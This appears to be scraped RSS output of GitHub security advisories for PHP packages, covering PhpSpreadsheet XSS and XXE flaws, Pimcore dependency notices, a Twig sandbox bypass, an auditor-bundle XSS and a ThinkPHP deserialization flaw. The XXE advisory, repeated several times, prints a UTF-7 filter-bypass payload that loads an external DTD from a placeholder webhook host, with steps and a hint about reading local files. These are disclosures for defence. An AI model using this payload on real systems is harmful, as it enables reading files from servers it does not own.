<li><a href="https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-wgmf-q9vr-vww6">https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-wgmf-q9vr-vww6</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45046">https://nvd.nist.gov/vuln/detail/CVE-2024-45046</a></li>
<li><a href="https://github.com/PHPOffice/PhpSpreadsheet/pull/3957">https://github.com/PHPOffice/PhpSpreadsheet/pull/3957</a></li>
<li><a href="https://github.com/PHPOffice/PhpSpreadsheet/commit/f7cf378faed2e11cf4825bf8bafea4922ae44667">https://github.com/PHPOffice/PhpSpreadsheet/commit/f7cf378faed2e11cf4825bf8bafea4922ae44667</a></li>
<li><a href="https://github.com/advisories/GHSA-wgmf-q9vr-vww6">https://github.com/advisories/GHSA-wgmf-q9vr-vww6</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-wgmf-q9vr-vww6</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-wgmf-q9vr-vww6</guid>
<author>GitHub</author>
</item>
<item>
<title>[phpoffice/phpspreadsheet] PhpSpreadsheet HTML writer is vulnerable to Cross-Site Scripting via style information</title>
<description><h3 id="summary">Summary</h3>
<p><code>\PhpOffice\PhpSpreadsheet\Writer\Html</code> doesn't sanitize spreadsheet styling information such as font names, allowing an attacker to inject arbitrary JavaScript on the page.</p>
<h3 id="poc">PoC</h3>
<p>Example target script:</p>
<pre><code>&lt;?php
require 'vendor/autoload.php';
$reader = \PhpOffice\PhpSpreadsheet\IOFactory::createReader("Xlsx");
$spreadsheet = $reader-&gt;load(__DIR__ . '/book.xlsx');
$writer = new \PhpOffice\PhpSpreadsheet\Writer\Html($spreadsheet);
print($writer-&gt;generateHTMLAll());
</code></pre>
<p>Save this file in the same directory:
<a href="https://github.com/PHPOffice/PhpSpreadsheet/files/15212797/book.xlsx">book.xlsx</a></p>
<p>Open index.php in a web browser. An alert should be displayed.</p>
<h3 id="impact">Impact</h3>
<p>Full takeover of the session of users viewing spreadsheet files as HTML.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-wgmf-q9vr-vww6">https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-wgmf-q9vr-vww6</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45046">https://nvd.nist.gov/vuln/detail/CVE-2024-45046</a></li>
<li><a href="https://github.com/PHPOffice/PhpSpreadsheet/pull/3957">https://github.com/PHPOffice/PhpSpreadsheet/pull/3957</a></li>
<li><a href="https://github.com/PHPOffice/PhpSpreadsheet/commit/f7cf378faed2e11cf4825bf8bafea4922ae44667">https://github.com/PHPOffice/PhpSpreadsheet/commit/f7cf378faed2e11cf4825bf8bafea4922ae44667</a></li>
<li><a href="https://github.com/advisories/GHSA-wgmf-q9vr-vww6">https://github.com/advisories/GHSA-wgmf-q9vr-vww6</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-wgmf-q9vr-vww6</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-wgmf-q9vr-vww6</guid>
<author>GitHub</author>
</item>
<item>
<title>[phpoffice/phpspreadsheet] XXE in PHPSpreadsheet encoding is returned</title>
<description><h3 id="summary">Summary</h3>
<p>Bypassing the filter allows a XXE-attack. Which is turn allows attacker to obtain contents of local files, even if error reporting muted by @ symbol. (LFI-attack) </p>
<h3 id="details">Details</h3>
<p>Check <code> $pattern = '/encoding="(.*?)"/';</code> easy to bypass. Just use a single quote symbol <code>'</code>. So payload looks like this:</p>
<pre><code>&lt;?xml version="1.0" encoding='UTF-7' standalone="yes"?&gt;
+ADw-!DOCTYPE xxe [+ADw-!ENTITY % xxe SYSTEM "http://example.com/file.dtd"&gt; %xxe;]&gt;
</code></pre>
<p>If you add this header to any XML file into xlsx-formatted file, such as sharedStrings.xml file, then xxe will execute. </p>
<h3 id="poc">PoC</h3>
<ol>
<li>Create simple xlsx file</li>
<li>Rename xlsx to zip</li>
<li>Go to the zip and open the <code>xl/sharedStrings.xml</code> file in edit mode.</li>
<li>Replace <code>&lt;?xml version="1.0" encoding="UTF-8" standalone="yes"?&gt;</code> to</li>
</ol>
<pre><code>&lt;?xml version="1.0" encoding='UTF-7' standalone="yes"?&gt;
+ADw-!DOCTYPE xxe [+ADw-!ENTITY % xxe SYSTEM "http://%webhook%/file.dtd"&gt; %xxe;]&gt;
</code></pre>
<ol start="5">
<li>Save <code>sharedStrings.xml</code> file and rename zip back to xlsx.</li>
<li>Use minimal php code that simply opens this xlsx file:</li>
</ol>
<pre><code>use PhpOffice\PhpSpreadsheet\IOFactory;
require __DIR__ . '/vendor/autoload.php';
$spreadsheet = IOFactory::load("file.xlsx");
</code></pre>
<ol start="7">
<li>You will receive the request to your <code>http://%webhook%/file.dtd</code></li>
<li>Dont't forget that you can use php-wrappers into xxe, some php:// wrapper payload allows fetch local files.</li>
</ol>
<h3 id="impact">Impact</h3>
<p>Read local files
<img alt="lfi" src="https://github.com/PHPOffice/PhpSpreadsheet/assets/95242087/1839cddb-6bb0-486d-8884-9ac485776931" referrerpolicy="no-referrer"></p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-ghg6-32f9-2jp7">https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-ghg6-32f9-2jp7</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45048">https://nvd.nist.gov/vuln/detail/CVE-2024-45048</a></li>
<li><a href="https://github.com/PHPOffice/PhpSpreadsheet/commit/bea2d4b30f24bcc8a7712e208d1359e603b45dda">https://github.com/PHPOffice/PhpSpreadsheet/commit/bea2d4b30f24bcc8a7712e208d1359e603b45dda</a></li>
<li><a href="https://github.com/advisories/GHSA-ghg6-32f9-2jp7">https://github.com/advisories/GHSA-ghg6-32f9-2jp7</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-ghg6-32f9-2jp7</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-ghg6-32f9-2jp7</guid>
<author>GitHub</author>
</item>
<item>
<title>[pimcore/pimcore] Pimcore includes vulnerable PHPOffice/PhpSpreadsheet</title>
<description><h3 id="summary">Summary</h3>
<p>Pimcore 10.6.x and Enterprise 10.6.x versions currently depend on PHPOffice/PhpSpreadsheet version 1.x, which has recently been identified with a security vulnerability (CVE-2024-45048). To mitigate this issue, it is recommended to update to the latest version 2.2.2. For more details, please refer to the official advisory: <a href="https://github.com/advisories/GHSA-ghg6-32f9-2jp7">GHSA-ghg6-32f9-2jp7</a>.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/pimcore/pimcore/security/advisories/GHSA-hq76-662x-7mw4">https://github.com/pimcore/pimcore/security/advisories/GHSA-hq76-662x-7mw4</a></li>
<li><a href="https://github.com/advisories/GHSA-ghg6-32f9-2jp7">https://github.com/advisories/GHSA-ghg6-32f9-2jp7</a></li>
<li><a href="https://github.com/advisories/GHSA-hq76-662x-7mw4">https://github.com/advisories/GHSA-hq76-662x-7mw4</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-hq76-662x-7mw4</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-hq76-662x-7mw4</guid>
<author>GitHub</author>
</item>
<item>
<title>[pimcore/pimcore] Pimcore includes vulnerable PHPOffice/PhpSpreadsheet</title>
<description><h3 id="summary">Summary</h3>
<p>Pimcore 10.6.x and Enterprise 10.6.x versions currently depend on PHPOffice/PhpSpreadsheet version 1.x, which has recently been identified with a security vulnerability (CVE-2024-45048). To mitigate this issue, it is recommended to update to the latest version 2.2.2. For more details, please refer to the official advisory: <a href="https://github.com/advisories/GHSA-ghg6-32f9-2jp7">GHSA-ghg6-32f9-2jp7</a>.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/pimcore/pimcore/security/advisories/GHSA-hq76-662x-7mw4">https://github.com/pimcore/pimcore/security/advisories/GHSA-hq76-662x-7mw4</a></li>
<li><a href="https://github.com/advisories/GHSA-ghg6-32f9-2jp7">https://github.com/advisories/GHSA-ghg6-32f9-2jp7</a></li>
<li><a href="https://github.com/advisories/GHSA-hq76-662x-7mw4">https://github.com/advisories/GHSA-hq76-662x-7mw4</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-hq76-662x-7mw4</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-hq76-662x-7mw4</guid>
<author>GitHub</author>
</item>
<item>
<title>[pimcore/admin-ui-classic-bundle] Pimcore includes vulnerable PHPOffice/PhpSpreadsheet</title>
<description><h3 id="summary">Summary</h3>
<p>Pimcore 10.6.x and Enterprise 10.6.x versions currently depend on PHPOffice/PhpSpreadsheet version 1.x, which has recently been identified with a security vulnerability (CVE-2024-45048). To mitigate this issue, it is recommended to update to the latest version 2.2.2. For more details, please refer to the official advisory: <a href="https://github.com/advisories/GHSA-ghg6-32f9-2jp7">GHSA-ghg6-32f9-2jp7</a>.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/pimcore/pimcore/security/advisories/GHSA-hq76-662x-7mw4">https://github.com/pimcore/pimcore/security/advisories/GHSA-hq76-662x-7mw4</a></li>
<li><a href="https://github.com/advisories/GHSA-ghg6-32f9-2jp7">https://github.com/advisories/GHSA-ghg6-32f9-2jp7</a></li>
<li><a href="https://github.com/advisories/GHSA-hq76-662x-7mw4">https://github.com/advisories/GHSA-hq76-662x-7mw4</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-hq76-662x-7mw4</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-hq76-662x-7mw4</guid>
<author>GitHub</author>
</item>
<item>
<title>[pimcore/admin-ui-classic-bundle] Pimcore includes vulnerable PHPOffice/PhpSpreadsheet</title>
<description><h3 id="summary">Summary</h3>
<p>Pimcore 10.6.x and Enterprise 10.6.x versions currently depend on PHPOffice/PhpSpreadsheet version 1.x, which has recently been identified with a security vulnerability (CVE-2024-45048). To mitigate this issue, it is recommended to update to the latest version 2.2.2. For more details, please refer to the official advisory: <a href="https://github.com/advisories/GHSA-ghg6-32f9-2jp7">GHSA-ghg6-32f9-2jp7</a>.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/pimcore/pimcore/security/advisories/GHSA-hq76-662x-7mw4">https://github.com/pimcore/pimcore/security/advisories/GHSA-hq76-662x-7mw4</a></li>
<li><a href="https://github.com/advisories/GHSA-ghg6-32f9-2jp7">https://github.com/advisories/GHSA-ghg6-32f9-2jp7</a></li>
<li><a href="https://github.com/advisories/GHSA-hq76-662x-7mw4">https://github.com/advisories/GHSA-hq76-662x-7mw4</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-hq76-662x-7mw4</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-hq76-662x-7mw4</guid>
<author>GitHub</author>
</item>
<item>
<title>[pimcore/admin-ui-classic-bundle] Pimcore includes vulnerable PHPOffice/PhpSpreadsheet</title>
<description><h3 id="summary">Summary</h3>
<p>Pimcore 10.6.x and Enterprise 10.6.x versions currently depend on PHPOffice/PhpSpreadsheet version 1.x, which has recently been identified with a security vulnerability (CVE-2024-45048). To mitigate this issue, it is recommended to update to the latest version 2.2.2. For more details, please refer to the official advisory: <a href="https://github.com/advisories/GHSA-ghg6-32f9-2jp7">GHSA-ghg6-32f9-2jp7</a>.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/pimcore/pimcore/security/advisories/GHSA-hq76-662x-7mw4">https://github.com/pimcore/pimcore/security/advisories/GHSA-hq76-662x-7mw4</a></li>
<li><a href="https://github.com/advisories/GHSA-ghg6-32f9-2jp7">https://github.com/advisories/GHSA-ghg6-32f9-2jp7</a></li>
<li><a href="https://github.com/advisories/GHSA-hq76-662x-7mw4">https://github.com/advisories/GHSA-hq76-662x-7mw4</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-hq76-662x-7mw4</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-hq76-662x-7mw4</guid>
<author>GitHub</author>
</item>
</channel>
</rss>... |
http://localhost:1200/github-advisor/data/composer - Success ✔️<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" version="2.0">
<channel>
<title>GitHub Advisory Database RSS - composer</title>
<link>https://github.com/advisories</link>
<atom:link href="http://localhost:1200/github-advisor/data/composer" rel="self" type="application/rss+xml"></atom:link>
<description>GitHub Advisory Database RSS - composer - Powered by RSSHub</description>
<generator>RSSHub</generator>
<webMaster>contact@rsshub.app (RSSHub)</webMaster>
<language>en</language>
<lastBuildDate>Fri, 13 Sep 2024 16:19:16 GMT</lastBuildDate>
<ttl>5</ttl>
<item>
<title>[phpoffice/phpspreadsheet] XXE in PHPSpreadsheet encoding is returned</title>
<description><h3 id="summary">Summary</h3>
<p>Bypassing the filter allows a XXE-attack. Which is turn allows attacker to obtain contents of local files, even if error reporting muted by @ symbol. (LFI-attack) </p>
<h3 id="details">Details</h3>
<p>Check <code> $pattern = '/encoding="(.*?)"/';</code> easy to bypass. Just use a single quote symbol <code>'</code>. So payload looks like this:</p>
<pre><code>&lt;?xml version="1.0" encoding='UTF-7' standalone="yes"?&gt;
+ADw-!DOCTYPE xxe [+ADw-!ENTITY % xxe SYSTEM "http://example.com/file.dtd"&gt; %xxe;]&gt;
</code></pre>
<p>If you add this header to any XML file into xlsx-formatted file, such as sharedStrings.xml file, then xxe will execute. </p>
<h3 id="poc">PoC</h3>
<ol>
<li>Create simple xlsx file</li>
<li>Rename xlsx to zip</li>
<li>Go to the zip and open the <code>xl/sharedStrings.xml</code> file in edit mode.</li>
<li>Replace <code>&lt;?xml version="1.0" encoding="UTF-8" standalone="yes"?&gt;</code> to</li>
</ol>
<pre><code>&lt;?xml version="1.0" encoding='UTF-7' standalone="yes"?&gt;
+ADw-!DOCTYPE xxe [+ADw-!ENTITY % xxe SYSTEM "http://%webhook%/file.dtd"&gt; %xxe;]&gt;
</code></pre>
<ol start="5">
<li>Save <code>sharedStrings.xml</code> file and rename zip back to xlsx.</li>
<li>Use minimal php code that simply opens this xlsx file:</li>
</ol>
<pre><code>use PhpOffice\PhpSpreadsheet\IOFactory;
require __DIR__ . '/vendor/autoload.php';
$spreadsheet = IOFactory::load("file.xlsx");
</code></pre>
<ol start="7">
<li>You will receive the request to your <code>http://%webhook%/file.dtd</code></li>
<li>Dont't forget that you can use php-wrappers into xxe, some php:// wrapper payload allows fetch local files.</li>
</ol>
<h3 id="impact">Impact</h3>
<p>Read local files
<img alt="lfi" src="https://github.com/PHPOffice/PhpSpreadsheet/assets/95242087/1839cddb-6bb0-486d-8884-9ac485776931" referrerpolicy="no-referrer"></p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-ghg6-32f9-2jp7">https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-ghg6-32f9-2jp7</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45048">https://nvd.nist.gov/vuln/detail/CVE-2024-45048</a></li>
<li><a href="https://github.com/PHPOffice/PhpSpreadsheet/commit/bea2d4b30f24bcc8a7712e208d1359e603b45dda">https://github.com/PHPOffice/PhpSpreadsheet/commit/bea2d4b30f24bcc8a7712e208d1359e603b45dda</a></li>
<li><a href="https://github.com/advisories/GHSA-ghg6-32f9-2jp7">https://github.com/advisories/GHSA-ghg6-32f9-2jp7</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-ghg6-32f9-2jp7</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-ghg6-32f9-2jp7</guid>
<author>GitHub</author>
</item>
<item>
<title>[phpoffice/phpspreadsheet] XXE in PHPSpreadsheet encoding is returned</title>
<description><h3 id="summary">Summary</h3>
<p>Bypassing the filter allows a XXE-attack. Which is turn allows attacker to obtain contents of local files, even if error reporting muted by @ symbol. (LFI-attack) </p>
<h3 id="details">Details</h3>
<p>Check <code> $pattern = '/encoding="(.*?)"/';</code> easy to bypass. Just use a single quote symbol <code>'</code>. So payload looks like this:</p>
<pre><code>&lt;?xml version="1.0" encoding='UTF-7' standalone="yes"?&gt;
+ADw-!DOCTYPE xxe [+ADw-!ENTITY % xxe SYSTEM "http://example.com/file.dtd"&gt; %xxe;]&gt;
</code></pre>
<p>If you add this header to any XML file into xlsx-formatted file, such as sharedStrings.xml file, then xxe will execute. </p>
<h3 id="poc">PoC</h3>
<ol>
<li>Create simple xlsx file</li>
<li>Rename xlsx to zip</li>
<li>Go to the zip and open the <code>xl/sharedStrings.xml</code> file in edit mode.</li>
<li>Replace <code>&lt;?xml version="1.0" encoding="UTF-8" standalone="yes"?&gt;</code> to</li>
</ol>
<pre><code>&lt;?xml version="1.0" encoding='UTF-7' standalone="yes"?&gt;
+ADw-!DOCTYPE xxe [+ADw-!ENTITY % xxe SYSTEM "http://%webhook%/file.dtd"&gt; %xxe;]&gt;
</code></pre>
<ol start="5">
<li>Save <code>sharedStrings.xml</code> file and rename zip back to xlsx.</li>
<li>Use minimal php code that simply opens this xlsx file:</li>
</ol>
<pre><code>use PhpOffice\PhpSpreadsheet\IOFactory;
require __DIR__ . '/vendor/autoload.php';
$spreadsheet = IOFactory::load("file.xlsx");
</code></pre>
<ol start="7">
<li>You will receive the request to your <code>http://%webhook%/file.dtd</code></li>
<li>Dont't forget that you can use php-wrappers into xxe, some php:// wrapper payload allows fetch local files.</li>
</ol>
<h3 id="impact">Impact</h3>
<p>Read local files
<img alt="lfi" src="https://github.com/PHPOffice/PhpSpreadsheet/assets/95242087/1839cddb-6bb0-486d-8884-9ac485776931" referrerpolicy="no-referrer"></p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-ghg6-32f9-2jp7">https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-ghg6-32f9-2jp7</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45048">https://nvd.nist.gov/vuln/detail/CVE-2024-45048</a></li>
<li><a href="https://github.com/PHPOffice/PhpSpreadsheet/commit/bea2d4b30f24bcc8a7712e208d1359e603b45dda">https://github.com/PHPOffice/PhpSpreadsheet/commit/bea2d4b30f24bcc8a7712e208d1359e603b45dda</a></li>
<li><a href="https://github.com/advisories/GHSA-ghg6-32f9-2jp7">https://github.com/advisories/GHSA-ghg6-32f9-2jp7</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-ghg6-32f9-2jp7</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-ghg6-32f9-2jp7</guid>
<author>GitHub</author>
</item>
<item>
<title>[twig/twig] Twig has a possible sandbox bypass</title>
<description><h3 id="description">Description</h3>
<p>Under some circumstances, the sandbox security checks are not run which allows user-contributed templates to bypass the sandbox restrictions.</p>
<p>The security issue happens when all these conditions are met:</p>
<ul>
<li>The sandbox is disabled globally;</li>
<li>The sandbox is enabled via a sandboxed <code>include()</code> function which references a template name (like <code>included.twig</code>) and not a <code>Template</code> or <code>TemplateWrapper</code> instance;</li>
<li>The included template has been loaded before the <code>include()</code> call but in a non-sandbox context (possible as the sandbox has been globally disabled).</li>
</ul>
<h3 id="resolution">Resolution</h3>
<p>The patch ensures that the sandbox security checks are always run at runtime.</p>
<h3 id="credits">Credits</h3>
<p>We would like to thank Fabien Potencier for reporting and fixing the issue.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/twigphp/Twig/security/advisories/GHSA-6j75-5wfj-gh66">https://github.com/twigphp/Twig/security/advisories/GHSA-6j75-5wfj-gh66</a></li>
<li><a href="https://github.com/twigphp/Twig/commit/11f68e2aeb526bfaf638e30d4420d8a710f3f7c6">https://github.com/twigphp/Twig/commit/11f68e2aeb526bfaf638e30d4420d8a710f3f7c6</a></li>
<li><a href="https://github.com/twigphp/Twig/commit/2102dd135986db79192d26fb5f5817a566e0a7de">https://github.com/twigphp/Twig/commit/2102dd135986db79192d26fb5f5817a566e0a7de</a></li>
<li><a href="https://github.com/twigphp/Twig/commit/7afa198603de49d147e90d18062e7b9addcf5233">https://github.com/twigphp/Twig/commit/7afa198603de49d147e90d18062e7b9addcf5233</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45411">https://nvd.nist.gov/vuln/detail/CVE-2024-45411</a></li>
<li><a href="https://github.com/twigphp/Twig/commit/41103dcdc2daab4c83cdd05b5b4fde5b7e41e635">https://github.com/twigphp/Twig/commit/41103dcdc2daab4c83cdd05b5b4fde5b7e41e635</a></li>
<li><a href="https://github.com/advisories/GHSA-6j75-5wfj-gh66">https://github.com/advisories/GHSA-6j75-5wfj-gh66</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-6j75-5wfj-gh66</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-6j75-5wfj-gh66</guid>
<author>GitHub</author>
</item>
<item>
<title>[twig/twig] Twig has a possible sandbox bypass</title>
<description><h3 id="description">Description</h3>
<p>Under some circumstances, the sandbox security checks are not run which allows user-contributed templates to bypass the sandbox restrictions.</p>
<p>The security issue happens when all these conditions are met:</p>
<ul>
<li>The sandbox is disabled globally;</li>
<li>The sandbox is enabled via a sandboxed <code>include()</code> function which references a template name (like <code>included.twig</code>) and not a <code>Template</code> or <code>TemplateWrapper</code> instance;</li>
<li>The included template has been loaded before the <code>include()</code> call but in a non-sandbox context (possible as the sandbox has been globally disabled).</li>
</ul>
<h3 id="resolution">Resolution</h3>
<p>The patch ensures that the sandbox security checks are always run at runtime.</p>
<h3 id="credits">Credits</h3>
<p>We would like to thank Fabien Potencier for reporting and fixing the issue.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/twigphp/Twig/security/advisories/GHSA-6j75-5wfj-gh66">https://github.com/twigphp/Twig/security/advisories/GHSA-6j75-5wfj-gh66</a></li>
<li><a href="https://github.com/twigphp/Twig/commit/11f68e2aeb526bfaf638e30d4420d8a710f3f7c6">https://github.com/twigphp/Twig/commit/11f68e2aeb526bfaf638e30d4420d8a710f3f7c6</a></li>
<li><a href="https://github.com/twigphp/Twig/commit/2102dd135986db79192d26fb5f5817a566e0a7de">https://github.com/twigphp/Twig/commit/2102dd135986db79192d26fb5f5817a566e0a7de</a></li>
<li><a href="https://github.com/twigphp/Twig/commit/7afa198603de49d147e90d18062e7b9addcf5233">https://github.com/twigphp/Twig/commit/7afa198603de49d147e90d18062e7b9addcf5233</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45411">https://nvd.nist.gov/vuln/detail/CVE-2024-45411</a></li>
<li><a href="https://github.com/twigphp/Twig/commit/41103dcdc2daab4c83cdd05b5b4fde5b7e41e635">https://github.com/twigphp/Twig/commit/41103dcdc2daab4c83cdd05b5b4fde5b7e41e635</a></li>
<li><a href="https://github.com/advisories/GHSA-6j75-5wfj-gh66">https://github.com/advisories/GHSA-6j75-5wfj-gh66</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-6j75-5wfj-gh66</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-6j75-5wfj-gh66</guid>
<author>GitHub</author>
</item>
<item>
<title>[damienharper/auditor-bundle] auditor-bundle vulnerable to Cross-site Scripting because name of entity does not get escaped</title>
<description><h3 id="summary">Summary</h3>
<p>Unescaped entity property enables Javascript injection.</p>
<h3 id="details">Details</h3>
<p>I think this is possible because %source_label% in twig macro is not escaped. Therefore script tags can be inserted and are executed.</p>
<h3 id="poc">PoC</h3>
<ul>
<li>clone example project <a href="https://github.com/DamienHarper/auditor-bundle-demo">https://github.com/DamienHarper/auditor-bundle-demo</a></li>
<li>create author with FullName </li>
<li>delete author</li>
<li>view audit of authors</li>
<li>alert is displayed</li>
</ul>
<h3 id="impact">Impact</h3>
<p>persistent XSS. JS can be injected and executed.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/DamienHarper/auditor-bundle/security/advisories/GHSA-78vg-7v27-hj67">https://github.com/DamienHarper/auditor-bundle/security/advisories/GHSA-78vg-7v27-hj67</a></li>
<li><a href="https://github.com/DamienHarper/auditor-bundle/commit/42ba2940d8b99467de0c806ea5655cc1c6882cd1">https://github.com/DamienHarper/auditor-bundle/commit/42ba2940d8b99467de0c806ea5655cc1c6882cd1</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45592">https://nvd.nist.gov/vuln/detail/CVE-2024-45592</a></li>
<li><a href="https://github.com/advisories/GHSA-78vg-7v27-hj67">https://github.com/advisories/GHSA-78vg-7v27-hj67</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-78vg-7v27-hj67</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-78vg-7v27-hj67</guid>
<author>GitHub</author>
</item>
<item>
<title>[topthink/framework] ThinkPHP deserialization vulnerability</title>
<description><p>A deserialization vulnerability in Thinkphp v6.1.3 to v8.0.4 allows attackers to execute arbitrary code.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-44902">https://nvd.nist.gov/vuln/detail/CVE-2024-44902</a></li>
<li><a href="https://github.com/fru1ts/CVE-2024-44902">https://github.com/fru1ts/CVE-2024-44902</a></li>
<li><a href="http://thinkphp.com/">http://thinkphp.com</a></li>
<li><a href="https://github.com/advisories/GHSA-f4wh-359g-4pq7">https://github.com/advisories/GHSA-f4wh-359g-4pq7</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-f4wh-359g-4pq7</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-f4wh-359g-4pq7</guid>
<author>GitHub</author>
</item>
<item>
<title>[twig/twig] Twig has a possible sandbox bypass</title>
<description><h3 id="description">Description</h3>
<p>Under some circumstances, the sandbox security checks are not run which allows user-contributed templates to bypass the sandbox restrictions.</p>
<p>The security issue happens when all these conditions are met:</p>
<ul>
<li>The sandbox is disabled globally;</li>
<li>The sandbox is enabled via a sandboxed <code>include()</code> function which references a template name (like <code>included.twig</code>) and not a <code>Template</code> or <code>TemplateWrapper</code> instance;</li>
<li>The included template has been loaded before the <code>include()</code> call but in a non-sandbox context (possible as the sandbox has been globally disabled).</li>
</ul>
<h3 id="resolution">Resolution</h3>
<p>The patch ensures that the sandbox security checks are always run at runtime.</p>
<h3 id="credits">Credits</h3>
<p>We would like to thank Fabien Potencier for reporting and fixing the issue.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/twigphp/Twig/security/advisories/GHSA-6j75-5wfj-gh66">https://github.com/twigphp/Twig/security/advisories/GHSA-6j75-5wfj-gh66</a></li>
<li><a href="https://github.com/twigphp/Twig/commit/11f68e2aeb526bfaf638e30d4420d8a710f3f7c6">https://github.com/twigphp/Twig/commit/11f68e2aeb526bfaf638e30d4420d8a710f3f7c6</a></li>
<li><a href="https://github.com/twigphp/Twig/commit/2102dd135986db79192d26fb5f5817a566e0a7de">https://github.com/twigphp/Twig/commit/2102dd135986db79192d26fb5f5817a566e0a7de</a></li>
<li><a href="https://github.com/twigphp/Twig/commit/7afa198603de49d147e90d18062e7b9addcf5233">https://github.com/twigphp/Twig/commit/7afa198603de49d147e90d18062e7b9addcf5233</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45411">https://nvd.nist.gov/vuln/detail/CVE-2024-45411</a></li>
<li><a href="https://github.com/twigphp/Twig/commit/41103dcdc2daab4c83cdd05b5b4fde5b7e41e635">https://github.com/twigphp/Twig/commit/41103dcdc2daab4c83cdd05b5b4fde5b7e41e635</a></li>
<li><a href="https://github.com/advisories/GHSA-6j75-5wfj-gh66">https://github.com/advisories/GHSA-6j75-5wfj-gh66</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-6j75-5wfj-gh66</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-6j75-5wfj-gh66</guid>
<author>GitHub</author>
</item>
<item>
<title>[twig/twig] Twig has a possible sandbox bypass</title>
<description><h3 id="description">Description</h3>
<p>Under some circumstances, the sandbox security checks are not run which allows user-contributed templates to bypass the sandbox restrictions.</p>
<p>The security issue happens when all these conditions are met:</p>
<ul>
<li>The sandbox is disabled globally;</li>
<li>The sandbox is enabled via a sandboxed <code>include()</code> function which references a template name (like <code>included.twig</code>) and not a <code>Template</code> or <code>TemplateWrapper</code> instance;</li>
<li>The included template has been loaded before the <code>include()</code> call but in a non-sandbox context (possible as the sandbox has been globally disabled).</li>
</ul>
<h3 id="resolution">Resolution</h3>
<p>The patch ensures that the sandbox security checks are always run at runtime.</p>
<h3 id="credits">Credits</h3>
<p>We would like to thank Fabien Potencier for reporting and fixing the issue.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/twigphp/Twig/security/advisories/GHSA-6j75-5wfj-gh66">https://github.com/twigphp/Twig/security/advisories/GHSA-6j75-5wfj-gh66</a></li>
<li><a href="https://github.com/twigphp/Twig/commit/11f68e2aeb526bfaf638e30d4420d8a710f3f7c6">https://github.com/twigphp/Twig/commit/11f68e2aeb526bfaf638e30d4420d8a710f3f7c6</a></li>
<li><a href="https://github.com/twigphp/Twig/commit/2102dd135986db79192d26fb5f5817a566e0a7de">https://github.com/twigphp/Twig/commit/2102dd135986db79192d26fb5f5817a566e0a7de</a></li>
<li><a href="https://github.com/twigphp/Twig/commit/7afa198603de49d147e90d18062e7b9addcf5233">https://github.com/twigphp/Twig/commit/7afa198603de49d147e90d18062e7b9addcf5233</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45411">https://nvd.nist.gov/vuln/detail/CVE-2024-45411</a></li>
